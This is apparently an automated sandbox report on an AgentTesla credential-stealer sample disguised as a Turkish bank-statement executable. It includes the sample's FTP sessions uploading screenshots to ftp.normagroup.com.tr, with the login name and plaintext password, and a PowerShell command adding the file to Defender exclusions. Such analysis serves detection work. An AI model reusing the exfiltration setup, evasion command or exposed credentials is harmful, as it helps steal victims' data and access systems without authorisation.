                                      Oct 3, 2024 09:15:17.010890007 CEST4976553275192.168.2.5104.247.165.99
                                      Oct 3, 2024 09:15:17.016442060 CEST5327549765104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:15:17.016454935 CEST5327549765104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:15:17.016463995 CEST5327549765104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:15:17.016472101 CEST5327549765104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:15:17.016480923 CEST5327549765104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:15:17.016556025 CEST4976553275192.168.2.5104.247.165.99
                                      Oct 3, 2024 09:15:17.016572952 CEST5327549765104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:15:17.016582966 CEST5327549765104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:15:17.016591072 CEST5327549765104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:15:17.016653061 CEST4976553275192.168.2.5104.247.165.99
                                      Oct 3, 2024 09:15:17.016726017 CEST5327549765104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:15:17.016735077 CEST5327549765104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:15:17.017314911 CEST4976553275192.168.2.5104.247.165.99
                                      Oct 3, 2024 09:15:17.022072077 CEST5327549765104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:15:17.022085905 CEST5327549765104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:15:17.022094965 CEST5327549765104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:15:17.022150040 CEST5327549765104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:15:17.022151947 CEST4976553275192.168.2.5104.247.165.99
                                      Oct 3, 2024 09:15:17.022183895 CEST5327549765104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:15:17.022193909 CEST5327549765104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:15:17.022206068 CEST5327549765104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:15:17.022216082 CEST5327549765104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:15:17.022223949 CEST5327549765104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:15:17.022253990 CEST4976553275192.168.2.5104.247.165.99
                                      Oct 3, 2024 09:15:17.022317886 CEST4976553275192.168.2.5104.247.165.99
                                      Oct 3, 2024 09:15:17.022408009 CEST5327549765104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:15:17.022418022 CEST5327549765104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:15:17.022469044 CEST4976553275192.168.2.5104.247.165.99
                                      Oct 3, 2024 09:15:17.022842884 CEST5327549765104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:15:17.025597095 CEST4976553275192.168.2.5104.247.165.99
                                      Oct 3, 2024 09:15:17.027589083 CEST5327549765104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:15:17.027601004 CEST5327549765104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:15:17.027688980 CEST5327549765104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:15:17.027770996 CEST4976553275192.168.2.5104.247.165.99
                                      Oct 3, 2024 09:15:17.027831078 CEST5327549765104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:15:17.027908087 CEST5327549765104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:15:17.027910948 CEST4976553275192.168.2.5104.247.165.99
                                      Oct 3, 2024 09:15:17.027921915 CEST5327549765104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:15:17.027931929 CEST5327549765104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:15:17.027940989 CEST5327549765104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:15:17.027949095 CEST5327549765104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:15:17.027978897 CEST4976553275192.168.2.5104.247.165.99
                                      Oct 3, 2024 09:15:17.028139114 CEST5327549765104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:15:17.031164885 CEST5327549765104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:15:17.032661915 CEST5327549765104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:15:17.032674074 CEST5327549765104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:15:17.032778025 CEST5327549765104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:15:17.032787085 CEST5327549765104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:15:17.032797098 CEST5327549765104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:15:17.032814026 CEST5327549765104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:15:17.032856941 CEST5327549765104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:15:17.032865047 CEST5327549765104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:15:17.032902002 CEST5327549765104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:15:17.033145905 CEST5327549765104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:15:17.033214092 CEST4976553275192.168.2.5104.247.165.99
                                      Oct 3, 2024 09:15:17.059159994 CEST4974621192.168.2.5104.247.165.99
                                      Oct 3, 2024 09:15:17.500665903 CEST2149746104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:15:17.543226957 CEST4974621192.168.2.5104.247.165.99
                                      Oct 3, 2024 09:15:23.113631964 CEST4974621192.168.2.5104.247.165.99
                                      Oct 3, 2024 09:15:23.118467093 CEST2149746104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:15:23.331587076 CEST2149746104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:15:23.331955910 CEST4976651305192.168.2.5104.247.165.99
                                      Oct 3, 2024 09:15:23.336941957 CEST5130549766104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:15:23.337120056 CEST4976651305192.168.2.5104.247.165.99
                                      Oct 3, 2024 09:15:23.337208033 CEST4974621192.168.2.5104.247.165.99
                                      Oct 3, 2024 09:15:23.342011929 CEST2149746104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:15:23.972349882 CEST2149746104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:15:23.972625971 CEST4976651305192.168.2.5104.247.165.99
                                      Oct 3, 2024 09:15:23.977689981 CEST5130549766104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:15:23.977703094 CEST5130549766104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:15:23.977724075 CEST5130549766104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:15:23.977745056 CEST5130549766104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:15:23.977768898 CEST4976651305192.168.2.5104.247.165.99
                                      Oct 3, 2024 09:15:23.977792025 CEST5130549766104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:15:23.977792978 CEST4976651305192.168.2.5104.247.165.99
                                      Oct 3, 2024 09:15:23.977823973 CEST5130549766104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:15:23.977830887 CEST4976651305192.168.2.5104.247.165.99
                                      Oct 3, 2024 09:15:23.977857113 CEST4976651305192.168.2.5104.247.165.99
                                      Oct 3, 2024 09:15:23.977876902 CEST5130549766104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:15:23.977888107 CEST5130549766104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:15:23.977935076 CEST4976651305192.168.2.5104.247.165.99
                                      Oct 3, 2024 09:15:23.977943897 CEST5130549766104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:15:23.977955103 CEST5130549766104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:15:23.978009939 CEST4976651305192.168.2.5104.247.165.99
                                      Oct 3, 2024 09:15:23.982712984 CEST5130549766104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:15:23.982723951 CEST5130549766104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:15:23.982736111 CEST5130549766104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:15:23.982765913 CEST5130549766104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:15:23.982783079 CEST4976651305192.168.2.5104.247.165.99
                                      Oct 3, 2024 09:15:23.982817888 CEST5130549766104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:15:23.982841015 CEST5130549766104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:15:23.982858896 CEST4976651305192.168.2.5104.247.165.99
                                      Oct 3, 2024 09:15:23.982882977 CEST4976651305192.168.2.5104.247.165.99
                                      Oct 3, 2024 09:15:23.982898951 CEST4976651305192.168.2.5104.247.165.99
                                      Oct 3, 2024 09:15:23.982992887 CEST5130549766104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:15:23.983100891 CEST4976651305192.168.2.5104.247.165.99
                                      Oct 3, 2024 09:15:23.987796068 CEST5130549766104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:15:23.987940073 CEST5130549766104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:15:23.988081932 CEST5130549766104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:15:23.988214016 CEST5130549766104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:15:23.988228083 CEST5130549766104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:15:23.988261938 CEST5130549766104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:15:23.988310099 CEST5130549766104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:15:23.988373041 CEST5130549766104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:15:23.988405943 CEST5130549766104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:15:23.988478899 CEST5130549766104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:15:23.988491058 CEST5130549766104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:15:23.988514900 CEST5130549766104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:15:23.988526106 CEST5130549766104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:15:23.988626003 CEST5130549766104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:15:23.988636971 CEST5130549766104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:15:23.988687992 CEST5130549766104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:15:23.988698959 CEST5130549766104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:15:23.989156961 CEST5130549766104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:15:23.989217043 CEST4976651305192.168.2.5104.247.165.99
                                      Oct 3, 2024 09:15:24.027604103 CEST4974621192.168.2.5104.247.165.99
                                      Oct 3, 2024 09:15:24.436398029 CEST2149746104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:15:24.480710030 CEST4974621192.168.2.5104.247.165.99
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Oct 3, 2024 09:12:54.449807882 CEST | 65434 | 53 | 192.168.2.5 | 1.1.1.1
Oct 3, 2024 09:12:54.910888910 CEST | 53 | 65434 | 1.1.1.1 | 192.168.2.5

Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Oct 3, 2024 09:12:54.449807882 CEST | 192.168.2.5 | 1.1.1.1 | 0x3a74 | Standard query (0) | ftp.normagroup.com.tr | A (IP address) | IN (0x0001) | false

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Oct 3, 2024 09:12:54.910888910 CEST | 1.1.1.1 | 192.168.2.5 | 0x3a74 | No error (0) | ftp.normagroup.com.tr | | 104.247.165.99 | A (IP address) | IN (0x0001) | false
                                      TimestampSource PortDest PortSource IPDest IPCommands
                                      Oct 3, 2024 09:13:07.003036976 CEST2149746104.247.165.99192.168.2.5220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------
                                      220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 3 of 50 allowed.
                                      220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 3 of 50 allowed.220-Local time is now 10:13. Server port: 21.
                                      220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 3 of 50 allowed.220-Local time is now 10:13. Server port: 21.220-This is a private system - No anonymous login
                                      220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 3 of 50 allowed.220-Local time is now 10:13. Server port: 21.220-This is a private system - No anonymous login220-IPv6 connections are also welcome on this server.
                                      220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 3 of 50 allowed.220-Local time is now 10:13. Server port: 21.220-This is a private system - No anonymous login220-IPv6 connections are also welcome on this server.220 You will be disconnected after 15 minutes of inactivity.
                                      Oct 3, 2024 09:13:07.006419897 CEST4974621192.168.2.5104.247.165.99USER admin@normagroup.com.tr
                                      Oct 3, 2024 09:13:07.225270033 CEST2149746104.247.165.99192.168.2.5331 User admin@normagroup.com.tr OK. Password required
                                      Oct 3, 2024 09:13:07.225553989 CEST4974621192.168.2.5104.247.165.99PASS Qb.X[.j.Yfm[
                                      Oct 3, 2024 09:13:07.470572948 CEST2149746104.247.165.99192.168.2.5230 OK. Current restricted directory is /
                                      Oct 3, 2024 09:13:07.689306974 CEST2149746104.247.165.99192.168.2.5504 Unknown command
                                      Oct 3, 2024 09:13:07.689443111 CEST4974621192.168.2.5104.247.165.99PWD
                                      Oct 3, 2024 09:13:07.906965971 CEST2149746104.247.165.99192.168.2.5257 "/" is your current location
                                      Oct 3, 2024 09:13:07.907135963 CEST4974621192.168.2.5104.247.165.99TYPE I
                                      Oct 3, 2024 09:13:08.124313116 CEST2149746104.247.165.99192.168.2.5200 TYPE is now 8-bit binary
                                      Oct 3, 2024 09:13:08.124536991 CEST4974621192.168.2.5104.247.165.99PASV
                                      Oct 3, 2024 09:13:08.341923952 CEST2149746104.247.165.99192.168.2.5227 Entering Passive Mode (104,247,165,99,234,7)
                                      Oct 3, 2024 09:13:08.352312088 CEST4974621192.168.2.5104.247.165.99STOR SC_user-048707_2024_11_23_23_03_22.jpeg
                                      Oct 3, 2024 09:13:08.962277889 CEST2149746104.247.165.99192.168.2.5150 Accepted data connection
                                      Oct 3, 2024 09:13:09.442370892 CEST2149746104.247.165.99192.168.2.5226-File successfully transferred
                                      226-File successfully transferred226 0.480 seconds (measured here), 154.75 Kbytes per second
                                      Oct 3, 2024 09:13:20.583569050 CEST4974621192.168.2.5104.247.165.99PASV
                                      Oct 3, 2024 09:13:20.801656008 CEST2149746104.247.165.99192.168.2.5227 Entering Passive Mode (104,247,165,99,198,85)
                                      Oct 3, 2024 09:13:20.807755947 CEST4974621192.168.2.5104.247.165.99STOR SC_user-048707_2024_12_02_05_42_19.jpeg
                                      Oct 3, 2024 09:13:21.431574106 CEST2149746104.247.165.99192.168.2.5150 Accepted data connection
                                      Oct 3, 2024 09:13:21.923731089 CEST2149746104.247.165.99192.168.2.5226-File successfully transferred
                                      226-File successfully transferred226 0.491 seconds (measured here), 151.58 Kbytes per second
                                      Oct 3, 2024 09:13:25.048399925 CEST4974621192.168.2.5104.247.165.99PASV
                                      Oct 3, 2024 09:13:25.266415119 CEST2149746104.247.165.99192.168.2.5227 Entering Passive Mode (104,247,165,99,235,22)
                                      Oct 3, 2024 09:13:25.271961927 CEST4974621192.168.2.5104.247.165.99STOR SC_user-048707_2024_12_06_10_03_08.jpeg
                                      Oct 3, 2024 09:13:25.932480097 CEST2149746104.247.165.99192.168.2.5150 Accepted data connection
                                      Oct 3, 2024 09:13:26.427440882 CEST2149746104.247.165.99192.168.2.5226-File successfully transferred
                                      226-File successfully transferred226 0.495 seconds (measured here), 156.22 Kbytes per second
                                      Oct 3, 2024 09:13:27.314317942 CEST4974621192.168.2.5104.247.165.99PASV
                                      Oct 3, 2024 09:13:27.532078981 CEST2149746104.247.165.99192.168.2.5227 Entering Passive Mode (104,247,165,99,194,80)
                                      Oct 3, 2024 09:13:27.537539005 CEST4974621192.168.2.5104.247.165.99STOR SC_user-048707_2024_12_09_12_31_02.jpeg
                                      Oct 3, 2024 09:13:28.134341002 CEST2149746104.247.165.99192.168.2.5150 Accepted data connection
                                      Oct 3, 2024 09:13:28.594593048 CEST2149746104.247.165.99192.168.2.5226-File successfully transferred
                                      226-File successfully transferred226 0.459 seconds (measured here), 161.84 Kbytes per second
                                      Oct 3, 2024 09:13:33.282485962 CEST4974621192.168.2.5104.247.165.99PASV
                                      Oct 3, 2024 09:13:33.653872013 CEST2149746104.247.165.99192.168.2.5227 Entering Passive Mode (104,247,165,99,234,87)
                                      Oct 3, 2024 09:13:33.662830114 CEST4974621192.168.2.5104.247.165.99STOR SC_user-048707_2024_12_14_07_10_21.jpeg
                                      Oct 3, 2024 09:13:34.317076921 CEST2149746104.247.165.99192.168.2.5150 Accepted data connection
                                      Oct 3, 2024 09:13:34.809006929 CEST2149746104.247.165.99192.168.2.5226-File successfully transferred
                                      226-File successfully transferred226 0.495 seconds (measured here), 149.96 Kbytes per second
                                      Oct 3, 2024 09:13:35.776626110 CEST4974621192.168.2.5104.247.165.99PASV
                                      Oct 3, 2024 09:13:36.041918039 CEST2149746104.247.165.99192.168.2.5227 Entering Passive Mode (104,247,165,99,239,250)
                                      Oct 3, 2024 09:13:36.057435036 CEST4974621192.168.2.5104.247.165.99STOR SC_user-048707_2024_12_17_13_36_38.jpeg
                                      Oct 3, 2024 09:13:36.617619991 CEST2149754104.247.165.99192.168.2.5220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------
                                      220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 4 of 50 allowed.
                                      220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 4 of 50 allowed.220-Local time is now 10:13. Server port: 21.
                                      220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 4 of 50 allowed.220-Local time is now 10:13. Server port: 21.220-This is a private system - No anonymous login
                                      220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 4 of 50 allowed.220-Local time is now 10:13. Server port: 21.220-This is a private system - No anonymous login220-IPv6 connections are also welcome on this server.
                                      220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 4 of 50 allowed.220-Local time is now 10:13. Server port: 21.220-This is a private system - No anonymous login220-IPv6 connections are also welcome on this server.220 You will be disconnected after 15 minutes of inactivity.
                                      Oct 3, 2024 09:13:36.618010998 CEST  49754  21  192.168.2.5  104.247.165.99  USER admin@normagroup.com.tr
                                      Oct 3, 2024 09:13:36.690882921 CEST  21  49746  104.247.165.99  192.168.2.5  150 Accepted data connection
                                      Oct 3, 2024 09:13:36.852281094 CEST  21  49754  104.247.165.99  192.168.2.5  331 User admin@normagroup.com.tr OK. Password required
                                      Oct 3, 2024 09:13:36.853719950 CEST  49754  21  192.168.2.5  104.247.165.99  PASS Qb.X[.j.Yfm[
                                      Oct 3, 2024 09:13:37.130883932 CEST  21  49754  104.247.165.99  192.168.2.5  230 OK. Current restricted directory is /
                                      Oct 3, 2024 09:13:37.178802013 CEST  21  49746  104.247.165.99  192.168.2.5  226-File successfully transferred
                                          226 0.500 seconds (measured here), 148.48 Kbytes per second
                                      Oct 3, 2024 09:13:37.220681906 CEST  49746  21  192.168.2.5  104.247.165.99  PASV
                                      Oct 3, 2024 09:13:37.358197927 CEST  21  49754  104.247.165.99  192.168.2.5  504 Unknown command
                                      Oct 3, 2024 09:13:37.358360052 CEST  49754  21  192.168.2.5  104.247.165.99  PWD
                                      Oct 3, 2024 09:13:37.438071966 CEST  21  49746  104.247.165.99  192.168.2.5  227 Entering Passive Mode (104,247,165,99,243,217)
                                      Oct 3, 2024 09:13:37.443713903 CEST  49746  21  192.168.2.5  104.247.165.99  STOR SC_user-048707_2024_12_22_13_44_07.jpeg
                                      Oct 3, 2024 09:13:37.591453075 CEST  21  49754  104.247.165.99  192.168.2.5  257 "/" is your current location
                                      Oct 3, 2024 09:13:37.591599941 CEST  49754  21  192.168.2.5  104.247.165.99  TYPE I
                                      Oct 3, 2024 09:13:37.815694094 CEST  21  49754  104.247.165.99  192.168.2.5  200 TYPE is now 8-bit binary
                                      Oct 3, 2024 09:13:37.820837021 CEST  49754  21  192.168.2.5  104.247.165.99  PASV
                                      Oct 3, 2024 09:13:38.044735909 CEST  21  49754  104.247.165.99  192.168.2.5  227 Entering Passive Mode (104,247,165,99,226,81)
                                      Oct 3, 2024 09:13:38.048470974 CEST  21  49746  104.247.165.99  192.168.2.5  150 Accepted data connection
                                      Oct 3, 2024 09:13:38.050405979 CEST  49754  21  192.168.2.5  104.247.165.99  STOR SC_user-048707_2024_12_19_18_11_34.jpeg
                                      Oct 3, 2024 09:13:38.511678934 CEST  21  49746  104.247.165.99  192.168.2.5  226-File successfully transferred
                                          226 0.463 seconds (measured here), 160.46 Kbytes per second
                                      Oct 3, 2024 09:13:38.673893929 CEST  21  49754  104.247.165.99  192.168.2.5  150 Accepted data connection
                                      Oct 3, 2024 09:13:39.148711920 CEST  21  49754  104.247.165.99  192.168.2.5  226-File successfully transferred
                                          226 0.475 seconds (measured here), 156.23 Kbytes per second
                                      Oct 3, 2024 09:14:16.077177048 CEST  49746  21  192.168.2.5  104.247.165.99  PASV
                                      Oct 3, 2024 09:14:16.295043945 CEST  21  49746  104.247.165.99  192.168.2.5  227 Entering Passive Mode (104,247,165,99,194,110)
                                      Oct 3, 2024 09:14:16.300910950 CEST  49746  21  192.168.2.5  104.247.165.99  STOR SC_user-048707_2025_01_14_13_06_30.jpeg
                                      Oct 3, 2024 09:14:16.914484978 CEST  21  49746  104.247.165.99  192.168.2.5  150 Accepted data connection
                                      Oct 3, 2024 09:14:17.397356033 CEST  21  49746  104.247.165.99  192.168.2.5  226-File successfully transferred
                                          226 0.483 seconds (measured here), 153.78 Kbytes per second
                                      Oct 3, 2024 09:14:40.035689116 CEST  49746  21  192.168.2.5  104.247.165.99  PASV
                                      Oct 3, 2024 09:14:40.258549929 CEST  21  49746  104.247.165.99  192.168.2.5  227 Entering Passive Mode (104,247,165,99,210,222)
                                      Oct 3, 2024 09:14:40.278170109 CEST  49746  21  192.168.2.5  104.247.165.99  STOR SC_user-048707_2025_01_26_19_47_34.jpeg
                                      Oct 3, 2024 09:14:40.957122087 CEST  21  49746  104.247.165.99  192.168.2.5  150 Accepted data connection
                                      Oct 3, 2024 09:14:41.446665049 CEST  21  49746  104.247.165.99  192.168.2.5  226-File successfully transferred
                                          226 0.489 seconds (measured here), 151.74 Kbytes per second
                                      Oct 3, 2024 09:14:50.766452074 CEST  49746  21  192.168.2.5  104.247.165.99  PASV
                                      Oct 3, 2024 09:14:51.002279043 CEST  21  49746  104.247.165.99  192.168.2.5  227 Entering Passive Mode (104,247,165,99,212,126)
                                      Oct 3, 2024 09:14:51.018516064 CEST  49746  21  192.168.2.5  104.247.165.99  STOR SC_user-048707_2025_02_02_14_08_50.jpeg
                                      Oct 3, 2024 09:14:51.643819094 CEST  21  49746  104.247.165.99  192.168.2.5  150 Accepted data connection
                                      Oct 3, 2024 09:14:52.128356934 CEST  21  49746  104.247.165.99  192.168.2.5  226-File successfully transferred
                                          226 0.484 seconds (measured here), 153.54 Kbytes per second
                                      Oct 3, 2024 09:14:59.723114014 CEST  49746  21  192.168.2.5  104.247.165.99  PASV
                                      Oct 3, 2024 09:14:59.940615892 CEST  21  49746  104.247.165.99  192.168.2.5  227 Entering Passive Mode (104,247,165,99,240,233)
                                      Oct 3, 2024 09:14:59.946182013 CEST  49746  21  192.168.2.5  104.247.165.99  STOR SC_user-048707_2025_02_08_11_53_49.jpeg
                                      Oct 3, 2024 09:15:01.139504910 CEST  21  49746  104.247.165.99  192.168.2.5  150 Accepted data connection
                                      Oct 3, 2024 09:15:01.139533997 CEST  21  49746  104.247.165.99  192.168.2.5  150 Accepted data connection
                                      Oct 3, 2024 09:15:01.139715910 CEST  21  49746  104.247.165.99  192.168.2.5  150 Accepted data connection
                                      Oct 3, 2024 09:15:01.625895977 CEST  21  49746  104.247.165.99  192.168.2.5  226-File successfully transferred
                                          226 1.058 seconds (measured here), 70.18 Kbytes per second
                                      Oct 3, 2024 09:15:16.163206100 CEST  49746  21  192.168.2.5  104.247.165.99  PASV
                                      Oct 3, 2024 09:15:16.381231070 CEST  21  49746  104.247.165.99  192.168.2.5  227 Entering Passive Mode (104,247,165,99,208,27)
                                      Oct 3, 2024 09:15:16.386667967 CEST  49746  21  192.168.2.5  104.247.165.99  STOR SC_user-048707_2025_02_22_16_38_31.jpeg
                                      Oct 3, 2024 09:15:17.010523081 CEST  21  49746  104.247.165.99  192.168.2.5  150 Accepted data connection
                                      Oct 3, 2024 09:15:17.500665903 CEST  21  49746  104.247.165.99  192.168.2.5  226-File successfully transferred
                                          226 0.491 seconds (measured here), 151.06 Kbytes per second
                                      Oct 3, 2024 09:15:23.113631964 CEST  49746  21  192.168.2.5  104.247.165.99  PASV
                                      Oct 3, 2024 09:15:23.331587076 CEST  21  49746  104.247.165.99  192.168.2.5  227 Entering Passive Mode (104,247,165,99,200,105)
                                      Oct 3, 2024 09:15:23.337208033 CEST  49746  21  192.168.2.5  104.247.165.99  STOR SC_user-048707_2024_10_03_03_15_22.jpeg
                                      Oct 3, 2024 09:15:23.972349882 CEST  21  49746  104.247.165.99  192.168.2.5  150 Accepted data connection
                                      Oct 3, 2024 09:15:24.436398029 CEST  21  49746  104.247.165.99  192.168.2.5  226-File successfully transferred
                                          226 0.465 seconds (measured here), 159.78 Kbytes per second


                                      Target ID:0
                                      Start time:03:11:13
                                      Start date:03/10/2024
                                      Path:C:\Users\user\Desktop\hesaphareketi__20241001.exe
                                      Wow64 process (32bit):true
                                      Commandline:"C:\Users\user\Desktop\hesaphareketi__20241001.exe"
                                      Imagebase:0xcb0000
                                      File size:716'800 bytes
                                      MD5 hash:5EAAFECA7053687B46ECFFAD93C82418
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Yara matches:
                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.2149976039.00000000048DA000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000000.00000002.2149976039.00000000048DA000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                      Reputation:low
                                      Has exited:true

                                      Target ID:3
                                      Start time:03:11:14
                                      Start date:03/10/2024
                                      Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                      Wow64 process (32bit):true
                                      Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\hesaphareketi__20241001.exe"
                                      Imagebase:0xf30000
                                      File size:433'152 bytes
                                      MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:high
                                      Has exited:true

                                      Target ID:4
                                      Start time:03:11:14
                                      Start date:03/10/2024
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff6d64d0000
                                      File size:862'208 bytes
                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:high
                                      Has exited:true

                                      Target ID:5
                                      Start time:03:11:14
                                      Start date:03/10/2024
                                      Path:C:\Users\user\Desktop\hesaphareketi__20241001.exe
                                      Wow64 process (32bit):true
                                      Commandline:"C:\Users\user\Desktop\hesaphareketi__20241001.exe"
                                      Imagebase:0x990000
                                      File size:716'800 bytes
                                      MD5 hash:5EAAFECA7053687B46ECFFAD93C82418
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Yara matches:
                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000005.00000002.4608159738.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000005.00000002.4608159738.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000005.00000002.4610095898.0000000002D71000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                      Reputation:low
                                      Has exited:false

                                      Target ID:6
                                      Start time:03:11:18
                                      Start date:03/10/2024
                                      Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                      Imagebase:0x7ff6ef0c0000
                                      File size:496'640 bytes
                                      MD5 hash:60FF40CFD7FB8FE41EE4FE9AE5FE1C51
                                      Has elevated privileges:true
                                      Has administrator privileges:false
                                      Programmed in:C, C++ or other language
                                      Reputation:high
                                      Has exited:true


                                        Execution Graph

                                        Execution Coverage:9.5%
                                        Dynamic/Decrypted Code Coverage:100%
                                        Signature Coverage:2.4%
                                        Total number of Nodes:291
                                        Total number of Limit Nodes:13

                                        Control-flow Graph

                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2169849677.0000000007570000.00000040.00000800.00020000.00000000.sdmp, Offset: 07570000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7570000_hesaphareketi__20241001.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: Te]q$Te]q
                                        • API String ID: 0-3320153681

                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2163631232.00000000055D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 055D0000, based on PE: false
                                        Joe Sandbox IDA Plugin
